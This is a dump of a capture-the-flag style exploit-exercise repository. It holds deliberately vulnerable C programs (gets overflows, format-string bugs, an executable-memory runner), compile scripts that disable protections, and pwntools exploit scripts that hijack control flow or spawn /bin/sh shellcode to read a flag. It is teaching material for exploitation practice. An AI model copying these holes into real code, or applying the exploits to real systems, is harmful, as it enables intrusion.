#include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | struct locals{ 14 | char name[BUF_SIZE]; 15 | char content[BUF_SIZE]; 16 | void (*hook)(); 17 | }; 18 | struct locals l = {.name = {0}, .content = {0}, .hook = 0}; 19 | 20 | printf("Creating message\n"); 21 | printf("Enter message name:"); 22 | fgets(l.name, BUF_SIZE, stdin); 23 | printf("Enter message content:"); 24 | gets(l.content); 25 | 26 | printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content); 27 | 28 | if(l.hook){ 29 | l.hook(); 30 | } 31 | } 32 | 33 | int menu(){ 34 | char buffer[BUF_SIZE] = {0}; 35 | 36 | printf("[*] menu\n"); 37 | printf("menu - show this menu\n"); 38 | printf("send - send new message\n"); 39 | printf("exit - close program\n"); 40 | 41 | fgets(buffer, BUF_SIZE, stdin); 42 | 43 | if (strcmp(buffer, "menu\n") == 0){ 44 | return 1; 45 | } 46 | else if (strcmp(buffer, "send\n") == 0){ 47 | send(); 48 | return 1; 49 | } 50 | else if (strcmp(buffer, "exit\n") == 0){ 51 | return 0; 52 | } 53 | else{ 54 | printf("Unknown command: %s", buffer); 55 | return 1; 56 | } 57 | 58 | } 59 | 60 | int main(int argc, char **argv){ 61 | setbuf(stdout, NULL); 62 | uid_t uid = geteuid(); 63 | setresuid(uid,uid,uid); 64 | printf("Welcome to ch02!\n"); 65 | while(1){ 66 | if (!(menu())){ 67 | break; 68 | } 69 | printf("\n"); 70 | } 71 | printf("Exiting...\n"); 72 | } 73 | -------------------------------------------------------------------------------- /writeups/i386/ch02/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch02.c -static -no-pie -o $1/ch02 2 | -------------------------------------------------------------------------------- /writeups/i386/ch02/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from I386Exploit import I386Exploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch02' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = I386Exploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | secret_func_addr = ELF(challenge_name).functions['secret'].address 22 | r.recvuntil('exit - close program') 23 | send(r, msg_name='angel', msg_content=cyclic(50) + pack(secret_func_addr, word_size=32)) 24 | r.recvuntil('zenysec') 25 | flag = 'zenysec' + r.recvuntil('\n') 26 | log.success('The flag is: {flag}'.format(flag=flag)) 27 | r.close() 28 | 29 | 30 | if __name__ == '__main__': 31 | parser = argparse.ArgumentParser(description='Exploit ch02') 32 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 33 | main(**vars(parser.parse_args())) 34 | -------------------------------------------------------------------------------- /writeups/i386/ch02/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/i386/ch03/ch03: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch03/ch03 -------------------------------------------------------------------------------- /writeups/i386/ch03/ch03.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | char name[BUF_SIZE] = {0}; 14 | char content[BUF_SIZE] = {0}; 15 | 16 | printf("Creating message\n"); 17 | printf("Enter message name:"); 18 | fgets(name, BUF_SIZE, stdin); 19 | printf("Enter message content:"); 20 | gets(content); 21 | 22 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 23 | } 24 | 25 | int menu(){ 26 | char buffer[BUF_SIZE] = {0}; 27 | 28 | printf("[*] menu\n"); 29 | printf("menu - show this menu\n"); 30 | printf("send - send new message\n"); 31 | printf("exit - close program\n"); 32 | 33 | fgets(buffer, BUF_SIZE, stdin); 34 | 35 | if (strcmp(buffer, "menu\n") == 0){ 36 | return 1; 37 | } 38 | else if (strcmp(buffer, "send\n") == 0){ 39 | send(); 40 | return 1; 41 | } 42 | else if (strcmp(buffer, "exit\n") == 0){ 43 | return 0; 44 | } 45 | else{ 46 | printf("Unknown command: %s", buffer); 47 | return 1; 48 | } 49 | 50 | } 51 | 52 | int main(int argc, char **argv){ 53 | setbuf(stdout, NULL); 54 | uid_t uid = geteuid(); 55 | setresuid(uid,uid,uid); 56 | printf("Welcome to ch03!\n"); 57 | while(1){ 58 | if (!(menu())){ 59 | break; 60 | } 61 | printf("\n"); 62 | } 63 | printf("Exiting...\n"); 64 | } 65 | -------------------------------------------------------------------------------- /writeups/i386/ch03/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch03.c -static -fno-stack-protector -no-pie -o $1/ch03 2 | -------------------------------------------------------------------------------- /writeups/i386/ch03/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from I386Exploit import I386Exploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch03' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = I386Exploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | functions = ELF(challenge_name).functions 22 | secret_func_addr = functions['secret'].address 23 | 24 | r.recvuntil('exit - close program') 25 | send(r, msg_name='angel', msg_content=cyclic(128) + pack(secret_func_addr, word_size=32)) 26 | r.recvuntil('zenysec') 27 | flag = 'zenysec' + r.recvuntil('\n') 28 | log.success('The flag is: {flag}'.format(flag=flag)) 29 | r.close() 30 | 31 | 32 | if __name__ == '__main__': 33 | parser = argparse.ArgumentParser(description='Exploit ch03') 34 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 35 | main(**vars(parser.parse_args())) 36 | -------------------------------------------------------------------------------- /writeups/i386/ch03/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/i386/ch04/ch04: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch04/ch04 -------------------------------------------------------------------------------- /writeups/i386/ch04/ch04.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | char content[BUF_SIZE*2] = "dummy"; 9 | char perm[BUF_SIZE*2] = "user"; 10 | 11 | void secret(){ 12 | system("cat flag"); 13 | } 14 | 15 | void send(){ 16 | char name[BUF_SIZE] = {0}; 17 | printf("Creating message\n"); 18 | printf("Enter message name:"); 19 | fgets(name, BUF_SIZE*2, stdin); 20 | printf("Enter message content:"); 21 | gets(content); 22 | 23 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 24 | if(strcmp(perm, "root") == 0){ 25 | secret(); 26 | } 27 | } 28 | 29 | int menu(){ 30 | char buffer[BUF_SIZE] = {0}; 31 | 32 | printf("[*] menu\n"); 33 | printf("menu - show this menu\n"); 34 | printf("send - send new message\n"); 35 | printf("exit - close program\n"); 36 | 37 | fgets(buffer, BUF_SIZE, stdin); 38 | 39 | if (strcmp(buffer, "menu\n") == 0){ 40 | return 1; 41 | } 42 | else if (strcmp(buffer, "send\n") == 0){ 43 | send(); 44 | return 1; 45 | } 46 | else if (strcmp(buffer, "exit\n") == 0){ 47 | return 0; 48 | } 49 | else{ 50 | printf("Unknown command: %s", buffer); 51 | return 1; 52 | } 53 | 54 | } 55 | 56 | int main(int argc, char **argv){ 57 | setbuf(stdout, NULL); 58 | uid_t uid = geteuid(); 59 | setresuid(uid,uid,uid); 60 | printf("Welcome to ch04!\n"); 61 | while(1){ 62 | if (!(menu())){ 63 | break; 64 | } 65 | printf("\n"); 66 | } 67 | printf("Exiting...\n"); 68 | } 69 | -------------------------------------------------------------------------------- /writeups/i386/ch04/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch04.c -static -no-pie -o $1/ch04 2 | -------------------------------------------------------------------------------- /writeups/i386/ch04/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from I386Exploit import I386Exploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch04' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = I386Exploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | r.recvuntil('exit - close program') 22 | send(r, msg_name='angel', msg_content=cyclic(128) + 'root') 23 | r.recvuntil('zenysec') 24 | flag = 'zenysec' + r.recvuntil('\n') 25 | log.success('The flag is: {flag}'.format(flag=flag)) 26 | r.close() 27 | 28 | 29 | if __name__ == '__main__': 30 | parser = argparse.ArgumentParser(description='Exploit ch04') 31 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 32 | main(**vars(parser.parse_args())) 33 | -------------------------------------------------------------------------------- /writeups/i386/ch04/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/i386/ch05/ch05: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch05/ch05 -------------------------------------------------------------------------------- /writeups/i386/ch05/ch05.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | char name[BUF_SIZE*2] = {0}; 14 | char content[BUF_SIZE*2] = {0}; 15 | 16 | printf("Creating message\n"); 17 | printf("Enter message name:"); 18 | fgets(name, BUF_SIZE*2, stdin); 19 | printf("Enter message content:"); 20 | fgets(content, BUF_SIZE*2, stdin); 21 | 22 | printf("name: \"%s\"\ncontent:\"", name); 23 | printf(content); 24 | printf("\"\n"); 25 | } 26 | 27 | int menu(){ 28 | char buffer[BUF_SIZE] = {0}; 29 | 30 | printf("[*] menu\n"); 31 | printf("menu - show this menu\n"); 32 | printf("send - send new message\n"); 33 | printf("exit - close program\n"); 34 | 35 | fgets(buffer, BUF_SIZE, stdin); 36 | 37 | if (strcmp(buffer, "menu\n") == 0){ 38 | return 1; 39 | } 40 | else if (strcmp(buffer, "send\n") == 0){ 41 | send(); 42 | return 1; 43 | } 44 | else if (strcmp(buffer, "exit\n") == 0){ 45 | return 0; 46 | } 47 | else{ 48 | printf("Unknown command: %s", buffer); 49 | return 1; 50 | } 51 | 52 | } 53 | 54 | int main(int argc, char **argv){ 55 | setbuf(stdout, NULL); 56 | uid_t uid = geteuid(); 57 | setresuid(uid,uid,uid); 58 | printf("Welcome to ch05!\n"); 59 | while(1){ 60 | if (!(menu())){ 61 | break; 62 | } 63 | printf("\n"); 64 | } 65 | printf("Exiting...\n"); 66 | exit(1); 67 | } 68 | -------------------------------------------------------------------------------- /writeups/i386/ch05/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch05.c -static -no-pie -o $1/ch05 2 | -------------------------------------------------------------------------------- /writeups/i386/ch05/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from I386Exploit import I386Exploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch05' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = I386Exploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | secret_func_addr = ELF(challenge_name).functions['secret'].address 22 | 23 | leak_offset = 1 24 | r.recvuntil('exit - close program') 25 | send(r, msg_name='angel', 26 | msg_content='%{leak_offset}$x'.format(leak_offset=leak_offset)) 27 | r.recvuntil('content:\"') 28 | stack_return = int(r.recvuntil('\n').strip(), 16) + 0xd8 29 | log.info("stack return: {stack_return}".format(stack_return=hex(stack_return))) 30 | r.recvuntil('exit - close program') 31 | 32 | r1 = (secret_func_addr & 0xffff) - 0x8 33 | r2 = ((secret_func_addr >> 16) - r1 - 9) & 0xffff 34 | content_offset01 = 30 35 | content_offset02 = 31 36 | 37 | # Option A 38 | send(r, msg_name='angel', 39 | msg_content='{ret01}{ret02}%{padding01}x%{content_offset01}$hnn%{padding02}x%{content_offset02}$hnn'.format( 40 | ret01=pack(stack_return, word_size=32), 41 | ret02=pack(stack_return + 2, word_size=32), 42 | content_offset01=content_offset01, 43 | content_offset02=content_offset02, 44 | padding01=r1, 45 | padding02=r2)) 46 | 47 | # Option B 48 | # send(r, msg_name='angel', 49 | # msg_content='{ret01}{ret02}%{padding01}x%{content_offset01}$hnn'.format( 50 | # ret01=pack(stack_return, word_size=32), 51 | # ret02=pack(stack_return + 2, word_size=32), 52 | # content_offset01=content_offset01, 53 | # padding01=r1)) 54 | 55 | r.recvuntil('zenysec') 56 | flag = 'zenysec' + r.recvuntil('\n') 57 | log.success('The flag is: {flag}'.format(flag=flag)) 58 | r.close() 59 | 60 | 61 | if __name__ == '__main__': 62 | parser = argparse.ArgumentParser(description='Exploit ch05') 63 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 64 | main(**vars(parser.parse_args())) 65 | -------------------------------------------------------------------------------- /writeups/i386/ch05/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/i386/ch06/ch06: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch06/ch06 -------------------------------------------------------------------------------- /writeups/i386/ch06/ch06.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | #define BUF_SIZE 50 9 | #define PAGE_SIZE 4096 10 | 11 | void runner(){ 12 | char content[PAGE_SIZE]; 13 | char *code; 14 | 15 | printf("Enter byte to run:"); 16 | fgets(content, PAGE_SIZE, stdin); 17 | 18 | code = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); 19 | memcpy(code, content, PAGE_SIZE); 20 | 21 | mprotect(code, PAGE_SIZE, PROT_READ|PROT_EXEC); 22 | 23 | void (*func)() = (void (*)())code; 24 | func(); 25 | 26 | munmap(code, PAGE_SIZE); 27 | } 28 | 29 | void send(){ 30 | char name[BUF_SIZE] = {0}; 31 | char content[BUF_SIZE] = {0}; 32 | 33 | printf("Creating message\n"); 34 | printf("Enter message name:"); 35 | fgets(name, BUF_SIZE, stdin); 36 | printf("Enter message content:"); 37 | fgets(content, BUF_SIZE, stdin); 38 | 39 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 40 | } 41 | 42 | int menu(){ 43 | char buffer[BUF_SIZE] = {0}; 44 | 45 | printf("[*] menu\n"); 46 | printf("menu - show this menu\n"); 47 | printf("send - send new message\n"); 48 | printf("runner - run bytes\n"); 49 | printf("exit - close program\n"); 50 | 51 | fgets(buffer, BUF_SIZE, stdin); 52 | 53 | if (strcmp(buffer, "menu\n") == 0){ 54 | return 1; 55 | } 56 | else if (strcmp(buffer, "send\n") == 0){ 57 | send(); 58 | return 1; 59 | } 60 | else if (strcmp(buffer, "runner\n") == 0){ 61 | runner(); 62 | return 1; 63 | } 64 | else if (strcmp(buffer, "exit\n") == 0){ 65 | return 0; 66 | } 67 | else{ 68 | printf("Unknown command: %s", buffer); 69 | return 1; 70 | } 71 | 72 | } 73 | 74 | int main(int argc, char **argv){ 75 | setbuf(stdout, NULL); 76 | uid_t uid = geteuid(); 77 | setresuid(uid,uid,uid); 78 | printf("Welcome to ch06!\n"); 79 | while(1){ 80 | if (!(menu())){ 81 | break; 82 | } 83 | printf("\n"); 84 | } 85 | printf("Exiting...\n"); 86 | } 87 | -------------------------------------------------------------------------------- /writeups/i386/ch06/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch06.c -static -no-pie -o $1/ch06 2 | -------------------------------------------------------------------------------- /writeups/i386/ch06/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from I386Exploit import I386Exploit 5 | import argparse 6 | 7 | 8 | def runner(r, payload): 9 | r.sendline('runner') 10 | r.recvuntil('Enter byte to run:') 11 | r.sendline(payload) 12 | 13 | 14 | def send(r, msg_name, msg_content): 15 | r.sendline('send') 16 | r.recvuntil('Enter message name:') 17 | r.sendline(msg_name) 18 | r.recvuntil('Enter message content:') 19 | r.sendline(msg_content) 20 | 21 | 22 | def main(execution): 23 | challenge_name = 'ch06' 24 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 25 | r = I386Exploit(challenge_name=challenge_name, execution=execution).r 26 | 27 | # Option 1 28 | shell_code = asm(shellcraft.i386.linux.sh()) 29 | 30 | r.recvuntil('exit - close program') 31 | runner(r, payload=shell_code) 32 | 33 | r.sendline('cat flag') 34 | r.recvuntil('zenysec') 35 | flag = 'zenysec' + r.recvuntil('\n') 36 | log.success('The flag is: {flag}'.format(flag=flag)) 37 | r.close() 38 | 39 | 40 | if __name__ == '__main__': 41 | parser = argparse.ArgumentParser(description='Exploit ch06') 42 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 43 | main(**vars(parser.parse_args())) 44 | -------------------------------------------------------------------------------- /writeups/i386/ch06/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/i386/ch07/ch07: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch07/ch07 -------------------------------------------------------------------------------- /writeups/i386/ch07/ch07.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | char str[BUF_SIZE] = "/bin/sh\x00"; 9 | 10 | void func(){ 11 | system("ls"); 12 | } 13 | 14 | void send(){ 15 | char name[BUF_SIZE] = {0}; 16 | char content[BUF_SIZE] = {0}; 17 | 18 | printf("Creating message\n"); 19 | printf("Enter message name:"); 20 | fgets(name, BUF_SIZE, stdin); 21 | printf("Enter message content:"); 22 | gets(content); 23 | 24 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 25 | } 26 | 27 | int menu(){ 28 | char buffer[BUF_SIZE] = {0}; 29 | 30 | printf("[*] menu\n"); 31 | printf("menu - show this menu\n"); 32 | printf("send - send new message\n"); 33 | printf("exit - close program\n"); 34 | 35 | fgets(buffer, BUF_SIZE, stdin); 36 | 37 | if (strcmp(buffer, "menu\n") == 0){ 38 | return 1; 39 | } 40 | else if (strcmp(buffer, "send\n") == 0){ 41 | send(); 42 | return 1; 43 | } 44 | else if (strcmp(buffer, "exit\n") == 0){ 45 | return 0; 46 | } 47 | else{ 48 | printf("Unknown command: %s", buffer); 49 | return 1; 50 | } 51 | 52 | } 53 | 54 | int main(int argc, char **argv){ 55 | setbuf(stdout, NULL); 56 | uid_t uid = geteuid(); 57 | setresuid(uid,uid,uid); 58 | printf("Welcome to ch07!\n"); 59 | while(1){ 60 | if (!(menu())){ 61 | break; 62 | } 63 | printf("\n"); 64 | } 65 | printf("Exiting...\n"); 66 | } 67 | -------------------------------------------------------------------------------- /writeups/i386/ch07/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch07.c -static -fno-stack-protector -no-pie -o $1/ch07 2 | -------------------------------------------------------------------------------- /writeups/i386/ch07/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from I386Exploit import I386Exploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch07' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = I386Exploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | e = ELF(challenge_name) 22 | functions = e.functions 23 | 24 | func_system_addr = functions['system'].address 25 | command_string_addr = list(e.search('/bin/sh'))[-1] 26 | 27 | r.recvuntil('exit - close program') 28 | send(r, msg_name='angel', 29 | msg_content=cyclic(128) + pack(func_system_addr, word_size=32) + 'aaaa' + pack(command_string_addr)) 30 | time.sleep(1) 31 | r.sendline('cat flag') 32 | r.recvuntil('zenysec') 33 | flag = 'zenysec' + r.recvuntil('\n') 34 | log.success('The flag is: {flag}'.format(flag=flag)) 35 | r.close() 36 | 37 | 38 | if __name__ == '__main__': 39 | parser = argparse.ArgumentParser(description='Exploit ch07') 40 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 41 | main(**vars(parser.parse_args())) 42 | -------------------------------------------------------------------------------- /writeups/i386/ch07/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/i386/ch08/ch08: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch08/ch08 -------------------------------------------------------------------------------- /writeups/i386/ch08/ch08.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void send(){ 9 | char name[BUF_SIZE] = {0}; 10 | char content[BUF_SIZE] = {0}; 11 | 12 | printf("Creating message\n"); 13 | printf("Enter message name:"); 14 | fgets(name, BUF_SIZE, stdin); 15 | printf("Enter message content:"); 16 | gets(content); 17 | 18 | printf("name: \""); 19 | printf(name); 20 | printf("\"\ncontent:\"%s\"\n", content); 21 | } 22 | 23 | int menu(){ 24 | char buffer[BUF_SIZE] = {0}; 25 | 26 | printf("[*] menu\n"); 27 | printf("menu - show this menu\n"); 28 | printf("send - send new message\n"); 29 | printf("exit - close program\n"); 30 | 31 | fgets(buffer, BUF_SIZE, stdin); 32 | 33 | if (strcmp(buffer, "menu\n") == 0){ 34 | return 1; 35 | } 36 | else if (strcmp(buffer, "send\n") == 0){ 37 | send(); 38 | return 1; 39 | } 40 | else if (strcmp(buffer, "exit\n") == 0){ 41 | return 0; 42 | } 43 | else{ 44 | printf("Unknown command: %s", buffer); 45 | return 1; 46 | } 47 | 48 | } 49 | 50 | int main(int argc, char **argv){ 51 | setbuf(stdout, NULL); 52 | uid_t uid = geteuid(); 53 | setresuid(uid,uid,uid); 54 | printf("Welcome to ch08!\n"); 55 | while(1){ 56 | if (!(menu())){ 57 | break; 58 | } 59 | printf("\n"); 60 | } 61 | printf("Exiting...\n"); 62 | } 63 | -------------------------------------------------------------------------------- /writeups/i386/ch08/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch08.c -static -fno-stack-protector -z execstack -no-pie -o $1/ch08 2 | -------------------------------------------------------------------------------- /writeups/i386/ch08/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from I386Exploit import I386Exploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch08' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = I386Exploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | shell_code = asm(shellcraft.i386.linux.sh()) 22 | 23 | r.recvuntil('exit - close program') 24 | send(r, msg_name='%5$x', msg_content="aaaa") 25 | r.recvuntil('name: \"') 26 | stack_ret = int(r.recvline().strip(), 16) - 0x13 27 | log.info('stack ret: {stack_ret}'.format(stack_ret=hex(stack_ret))) 28 | 29 | r.recvuntil('exit - close program') 30 | send(r, msg_name='angel', 31 | msg_content=cyclic(128) + pack(stack_ret+4, word_size=32) + shell_code) 32 | 33 | time.sleep(1) 34 | r.sendline('cat flag') 35 | r.recvuntil('zenysec') 36 | flag = 'zenysec' + r.recvuntil('\n') 37 | log.success('The flag is: {flag}'.format(flag=flag)) 38 | r.close() 39 | 40 | 41 | if __name__ == '__main__': 42 | parser = argparse.ArgumentParser(description='Exploit ch08') 43 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 44 | main(**vars(parser.parse_args())) 45 | -------------------------------------------------------------------------------- /writeups/i386/ch08/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/i386/ch09/ch09: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch09/ch09 -------------------------------------------------------------------------------- /writeups/i386/ch09/ch09.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | typedef struct{ 9 | char name[BUF_SIZE]; 10 | char content[BUF_SIZE]; 11 | } message; 12 | 13 | typedef struct{ 14 | char junk01[BUF_SIZE]; 15 | char junk02[BUF_SIZE]; 16 | void (*func_ptr)(); 17 | } important; 18 | 19 | void secret(){ 20 | system("cat flag"); 21 | } 22 | 23 | void send(){ 24 | 25 | message* msg = (message*) malloc(sizeof(message)); 26 | important* object_01 = (important*) malloc(sizeof(important)); 27 | 28 | printf("Creating message\n"); 29 | printf("Enter message name:"); 30 | fgets(msg->name, BUF_SIZE, stdin); 31 | printf("Enter message content:"); 32 | gets(msg->content); 33 | 34 | if (object_01->func_ptr){ 35 | object_01->func_ptr(); 36 | } 37 | 38 | printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content); 39 | } 40 | 41 | int menu(){ 42 | char buffer[BUF_SIZE] = {0}; 43 | 44 | printf("[*] menu\n"); 45 | printf("menu - show this menu\n"); 46 | printf("send - send new message\n"); 47 | printf("exit - close program\n"); 48 | 49 | fgets(buffer, BUF_SIZE, stdin); 50 | 51 | if (strcmp(buffer, "menu\n") == 0){ 52 | return 1; 53 | } 54 | else if (strcmp(buffer, "send\n") == 0){ 55 | send(); 56 | return 1; 57 | } 58 | else if (strcmp(buffer, "exit\n") == 0){ 59 | return 0; 60 | } 61 | else{ 62 | printf("Unknown command: %s", buffer); 63 | return 1; 64 | } 65 | 66 | } 67 | 68 | int main(int argc, char **argv){ 69 | setbuf(stdout, NULL); 70 | uid_t uid = geteuid(); 71 | setresuid(uid,uid,uid); 72 | printf("Welcome to ch09!\n"); 73 | while(1){ 74 | if (!(menu())){ 75 | break; 76 | } 77 | printf("\n"); 78 | } 79 | printf("Exiting...\n"); 80 | } 81 | -------------------------------------------------------------------------------- /writeups/i386/ch09/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch09.c -static -no-pie -o $1/ch09 2 | -------------------------------------------------------------------------------- /writeups/i386/ch09/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from I386Exploit import I386Exploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch09' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = I386Exploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | secret_func_addr = ELF(challenge_name).functions['secret'].address 22 | r.recvuntil('exit - close program') 23 | send(r, msg_name='angel', msg_content=cyclic(162) + pack(secret_func_addr, word_size=32)) 24 | 25 | r.recvuntil('zenysec') 26 | flag = 'zenysec' + r.recvuntil('\n') 27 | log.success('The flag is: {flag}'.format(flag=flag)) 28 | r.close() 29 | 30 | 31 | if __name__ == '__main__': 32 | parser = argparse.ArgumentParser(description='Exploit ch09') 33 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 34 | main(**vars(parser.parse_args())) 35 | -------------------------------------------------------------------------------- /writeups/i386/ch09/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/i386/ch10/ch10: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch10/ch10 -------------------------------------------------------------------------------- /writeups/i386/ch10/ch10.c: -------------------------------------------------------------------------------- 1 | 